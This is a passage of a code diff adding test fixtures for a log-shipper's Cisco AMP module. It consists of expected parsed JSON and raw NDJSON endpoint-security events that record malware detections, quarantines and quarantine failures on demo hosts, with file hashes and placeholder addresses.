"tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:12:53.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.DFC.MalParent", + "cisco.amp.detection_id": "6533667579691532306", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 747000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533667579691532000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 56512, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:12:53.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.DFC.MalParent", + "cisco.amp.detection_id": "6533667579691532305", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 371000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533667579691532000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 57830, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + } +] \ No newline at end of file diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp4.ndjson.log b/x-pack/filebeat/module/cisco/amp/test/cisco_amp4.ndjson.log new file mode 100644 index 000000000000..f31bf18a23a1 --- /dev/null +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp4.ndjson.log @@ -0,0 +1,100 @@ +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6508397899087348000,"timestamp":1610659036,"timestamp_nanoseconds":295927133,"date":"2021-01-14T21:17:16+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.6A37D750F0-100.SBX.TG","detection_id":"6508397899087347713","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86","sha1":"5ca4bef8de6def53519d4b22632675bb4c1e470b","md5":"41476df3138717868118d8542cf3d1d6"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14930696955218,"timestamp":1610656706,"timestamp_nanoseconds":844899579,"date":"2021-01-14T20:38:26+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"W32.E4FCCBFA69-95.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610656706,"start_date":"2021-01-14T20:38:26+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"},"parent":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":587000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6412680266518626319","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":494000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6412680266518626317","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":587000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626319","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"28242311.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"},"parent":{"process_id":7120,"disposition":"Malicious","file_name":"QuotaGroup.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014","sha1":"f504774b72acfb23a46217aec9c6559fd7e4df64","md5":"b5ede95ec8bc4ad6984758be42b152bd"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":572000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626318","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014","sha1":"f504774b72acfb23a46217aec9c6559fd7e4df64","md5":"b5ede95ec8bc4ad6984758be42b152bd"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":494000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626317","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"28242311.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"},"parent":{"process_id":4788,"disposition":"Malicious","file_name":"28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":478000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626316","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"28242311.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014","sha1":"f504774b72acfb23a46217aec9c6559fd7e4df64","md5":"b5ede95ec8bc4ad6984758be42b152bd"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":587000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6412680266518626318","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":494000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6412680266518626316","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303574240493599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303574240493597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526295","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526294","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526293","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526292","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526291","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526288","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526287","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526286","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558988","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 